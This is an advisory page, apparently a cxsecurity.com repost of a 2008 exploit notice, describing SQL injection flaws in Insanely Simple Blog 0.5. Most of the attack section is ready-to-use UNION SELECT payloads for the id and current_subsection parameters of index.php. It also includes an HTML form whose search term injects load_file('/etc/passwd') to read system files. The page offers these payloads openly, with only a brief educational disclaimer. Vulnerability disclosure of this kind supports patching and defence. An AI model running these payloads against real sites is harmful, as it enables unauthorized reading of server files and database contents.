Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

2008.06.14
Credit: unohope
Risk: Low
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

_____ _ _ _____ _____ _____ _____ / ___| |_| | _ \| _ | _ |_ _| | (___| _ | [_)_/| (_) | (_) | | | \_____|_| |_|_| |_||_____|_____| |_| C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org _ _ _ _____ ____ ____ __ _ Hacks In Taiwan | |_| | |_ _| __| | \| | Conference 2008 | _ | | | | | (__| () | | |_| |_|_| |_| \____|____|_|\__| http://www.hitcon.org Title =======:: Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities Author ======:: unohope [at] chroot [dot] org IRC =========:: irc.chroot.org #chroot ScriptName ==:: Insanely Simple Blog Download ====:: http://jaist.dl.sourceforge.net/sourceforge/insanelysimple2/insanely_sim ple_blog0.5.zip Mirror ======:: http://www.badongo.com/file/9706939 ______________________ [SQL Injection] - {index.php} - http://localhost/isblog/index.php?id=-99+union+select+0,1,2,3,4,5,6,load _file('/etc/passwd'),8/* http://localhost/isblog/index.php?current_subsection=-99+union+select+0, 1,2,3,4,5,6,load_file('/etc/passwd'),8/* <form action="http://localhost/isblog/index.php?action=search" method="post"> <input type="hidden" name="term" value="-99' union select 0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*"> <input type="submit" value="send"> </form> ______ [NOTE] !! This is just for educational purposes, DO NOT use for illegal. !!

References:

http://www.securityfocus.com/bid/29630
http://www.securityfocus.com/archive/1/archive/1/493224/100/0/threaded
http://www.milw0rm.com/exploits/5774
http://chroot.org/exploits/chroot_uu_010


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top